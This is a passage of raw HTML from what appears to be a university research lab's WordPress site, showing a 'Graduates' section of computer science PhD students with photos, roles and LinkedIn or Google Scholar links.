20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 